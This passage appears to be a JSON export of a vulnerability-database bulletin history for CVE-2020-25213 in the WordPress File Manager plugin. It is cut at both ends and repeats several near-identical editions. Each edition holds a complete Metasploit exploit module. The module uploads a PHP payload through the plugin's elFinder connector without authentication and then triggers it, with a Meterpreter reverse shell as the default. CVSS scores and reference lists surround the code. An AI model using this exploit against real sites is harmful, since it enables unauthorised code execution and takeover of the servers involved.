)\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-11] #", "category": "", "verified": false}, "lastseen": "2021-10-11T00:18:45", "differentElements": ["sourceData"], "edition": 38}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "87c61e74ab410ab4060d5a2b727c8309", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-12T11:41:53", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-11T00:18:45", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-11T00:18:45", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-12] #", "category": "", "verified": false}, "lastseen": "2021-10-12T11:41:53", "differentElements": ["sourceData"], "edition": 39}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "bb3aa0b0b0e873c73443b10f10978e56", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-12T22:37:07", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-12T22:37:07", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-12T22:37:07", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-13] #", "category": "", "verified": false}, "lastseen": "2021-10-12T22:37:07", "differentElements": ["sourceData"], "edition": 40}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "076e857bd48eca8847e59a064f3f03cd", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-14T08:41:01", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-14T08:41:01", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-14T08:41:01", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-14] #", "category": "", "verified": false}, "lastseen": "2021-10-14T08:41:01", "differentElements": ["sourceData"], "edition": 41}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "2c67c0144b7d04d149752aab482ecd0d", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-14T22:56:10", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-14T22:56:10", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-14T22:56:10", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery 